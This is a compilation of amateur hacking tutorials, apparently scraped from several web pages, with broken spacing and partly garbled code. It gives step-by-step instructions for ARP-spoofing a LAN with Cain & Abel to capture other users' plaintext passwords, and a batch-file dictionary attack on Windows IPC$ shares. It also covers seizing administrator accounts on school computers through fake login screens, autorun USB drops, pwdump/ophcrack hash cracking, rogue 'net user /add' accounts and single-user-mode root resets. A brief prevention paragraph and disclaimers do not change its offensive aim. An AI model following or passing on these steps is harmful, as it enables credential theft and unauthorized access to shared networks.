Here are the steps: Step 1: Download, install and run Cain & Abel at http://www.oxid.it/cain.

html Step 2: Click Configure in the top bar. Step 3: In the Sniffer tab, click the adapter which is connected to the network to be sniffed, then click Apply , then OK . Step 4: Click the Sniffer tab in the main window. Step 5: Click the network card in the top bar (2nd icon from the left). Step 6: Click the + button in the top bar. Step 7: Select All hosts in my subnet , click OK . Entries should appear in the main w indow under the IP address , MAC address and OUI fingerprint headings. Step 8: From the Sniffer tab, click APR in the bottom tab. Step 9: Click the top right pane in the main window. Click the + button in the top bar. Step 10: Click on the router in the left pane. The router is generally the entry which has the lowest final IP value (xxx.xxx.xxx.*). Highlight the IP addresses to sniff in the right pane. Click OK . Step 11: Click the ARP icon in the top bar (3rd icon from the left). Wait until other users have logged into websites on other computers. Depending on the size of the network and the traffic which this network receives, this can range from minutes to hours. Step 12: After some time has passed, click Passwords in the bottom tab. Step 13: In the left pane, select the bolded entries. The right pane should show the time, server, username, password (in plaintext) and site accessed. Doesn t look like you can grab network admin info, more of a website user/pass hac k. Its still pretty kewl though.

****************************** For the one works in the Local Area Network (LAN) with Network Neighborhood, and want to hack administrator password, this article may help. Moreover, LAN admin istrators often make something unhappiness with his right. Port 139 is the used port in the windows system with the computer network runnin g NetBIOS (Network Basic Input Output System). Users can identify and utilize th e port, and will dig up detailed information about the network data including th e password on the share folder and the administrator password. This time, we will use bat file format that we created from notepad called Brute .bat. Previously, we need also to make some txt file that is passlist.txt, logfi le.txt and output.txt. For the last two files, no need to fill in. While passlis t.txt must fill in the vocabulary estimates admin password. Write the name of th e start sequence, the name of child, wife, girl friend, date of birth, place of work, favourite food and all things in the estimate as the admin password. In th e underground world, this passlist.txt file is known by the term Dictionary Atta ck. The techniques to guess a password like this are indeed take longer time. Howeve r, with the patien, especially in feel irritated by the admin, then all light to be felt. Once everything is ready, we will create a brute.bat file. copy the following co de and paste with notepad software. Save it with brute.bat file:

@ echo off if "% 1 "=="" goto fin if "% 2 "=="" goto fin del logfile.txt FOR / F "tokens = 1"%% i in (passlist.txt) do ^ echo%% i & & ^ net use \ \% 1 \ ipc $%% i / u:% 1 \% 2 2>> & & ^ logfile.txt echo% date%% time%>> & & ^ outfile.txt echo \ \% 1 \ ipc $ acct: pass% 2:%% i>> output.txt & & goto end : fin echo Then go to the Command Prompt via Start button -> Run type cmd. Then go to the f older where the brute.bat file is saved. the program by typing Brute. For exampl e, Brute 192.169.21.02 Administrator. To know the IP Address admin, download imaniac software at www.nostalgia.host.sk . Imaniac is the IP Address search software on the computer connected to the net work. If brute.bat successfully find the admin password, then the password will be sav ed in the output.txt file that we created earlier. Prevent The Admin Password Theft To anticipate the Dictionary Attack, administrators should create a password tha t is strong and difficult to guess through the letter-number combination. In add ition, admin need to disable the Command Prompt in order not so easy to accessed by unresponsible user. Because of this menu the user do in hacking activities, such as NetBIOS and others. Click Start button -> Run, type gpedit.msc, and pres s ENTER. Once inside the Group Policy Editor window, select User Configuration > Administrative Templates -> System ->. On the right side window, search preven t Access To The Command Prompt and double click. Then, click Enable -> Apply -> Ok -> Restart the computer.

******************************************************************************** ****** Method 1 1 The Trophy. The goal here is that it doesn't work to gain access to an administr ator account. Doing anything malicious or damaging is illegal and unethical, so please don't! The ethical thing to do would be to find a way into the system thr ough cunning and intelligence, and only make it obvious that the system has been compromised. If you can access cmd.exe, then change the password of an Admin, and change thei r personal settings, and be awesome to change the wallpaper to something humorou s (if you can't, open Notepad and type in the following to get a something like a copy of it: @echo off cmd echo on

or type in "start command.com" Save as a batch file and change "Save File as Typ e" to all files; do not save as txt. 2 Scope out the battlefield. See if the command prompt or the registry is enabled on student accounts. With these enabled, you'll have quite a bit of power. 3 Procure an administrator password. It depends on who you are dealing with, as do es the last instruction: if they're intelligent, you'll never get near one, if t hey are not so sharp all you have to do is wait, or type in cmd (net users admin istrator *) 4 Practice reading people's keystrokes with a friend, regularly have "problems" wi th your account during class requiring the teacher to log in, etc. etc. If an ad ministrator or teacher leaves themselves logged in, see what you can do while th ey're gone. If it's an admin, find the remote desktop connection to the server a nd copy it to a place where you can access it on your normal account. This is a file, hopefully with the Admin's password saved on it, that will connect to the server, allowing you unfettered access to the network. Again, tweak a few things , etc., don't destroy anything. 5 Social Engineering is the single best way to access a system, or so say many. It often requires no techy knowledge to instigate, but the more you have, the bett er. For example, leave a USB stick beside the teacher's computer in the computer -room/library/classroom, with an autoexec file that compromises the account in s ome way, similarly you can doctor a USB mouse to contain a USB drive with a simi lar autoexec file. Write a program that looks like the login screen, or some log in screen that your Admin might use, and ask him to enter their password. The po ssibilities are endless. Social Engineering can be really handy, the more you know about someone, the bet ter it is. Just get to know every little detail about them, personal details (te lephone number/email-address etc), hobbies, likes/dislikes; just everything! And you will be able to guess the password eventually, or get the person to say the irs because they trust you enough;bingo! Method 2 1 If you want to crack the Administrator account using software, follow these step s. It might be easy, but it isn't fun. 2 Download pwdump to the computer that you are using. If the site is blocked then you should download it to a thumb drive and put it in the computer. 3 Right click in a any folder and then New>Text Document. 4 Open it and type "command.com" 5 File>Save As and save is as something.bat. 6 Double click on something.bat. 7 Navigate to the pwdump folder using CD the location of pwdump. 8 Type -o hashes.txt localhost email hashes.txt to yourself or put it on your thum b drive. 9 On your own computer Google-install ophcrack and follow one of the guides. 10 Click load pwdump file and locate the text file to load the hashes. 11

And you cracked the administrator. Method 3 1 If you are unable to get the admin password with windows ophcrack then try these steps. 2 Download the ophcrack live CD iso. 3 Burn it to a CD. 4 Place it in the computer you want to hack and set up the computer to boot from C D. You can set this up in the bios set up. 5 Boot from CD in graphical mode and ophcrack will attempt to crack the passwords automatically. 6 Note: if the CD is unable to find the password, this is because the admin passwo rd contains a special character. This means that to crack it you must first down load the rainbow tables named xp special or vista special. The only way I know h ow to do this is through a torrent. Then you must put them on an eternal hard dr ive and use them with the live cd. 7 Enjoy the password but DO NOT do anything against your school's wishes with it. Method 4 1 Open Run and enter {cmd} then open it. Once you open it, type {net user /add } a nd type a username, put a space and type your easy-to-remember password. Enter i t into the prompt and log off. Now you can log onto that file without anyone kno wing that you are now an administrator. Have fun with your restrictionless account! It's literally restrictionless becau se you're an admin! Method 5 1 Another method which does not grant you server access is to make your self an ad min. However this may mean you can modify permissions on anything. Please be car eful with this - you could stop the computer from accessing the school network, or you could corrupt the operating system. This works on Macs only. Don't bother trying this on a PC. 2 Boot the computer into single user mode (hold command + s while booting) 3 Let it scroll through the lines of text 4 Type sbin/mount -wu sbin/SystemStarter OR launchctl load /System/Library/LaunchDaemons/com.apple.Dir ectoryServices.plist (this is faster) passwd root 5 Now type what ever password you want/ can remember and hit enter. 6

Type reboot 7 It will auto reboot the system when you get to the login screen use root as the lgoin in and your new password and viola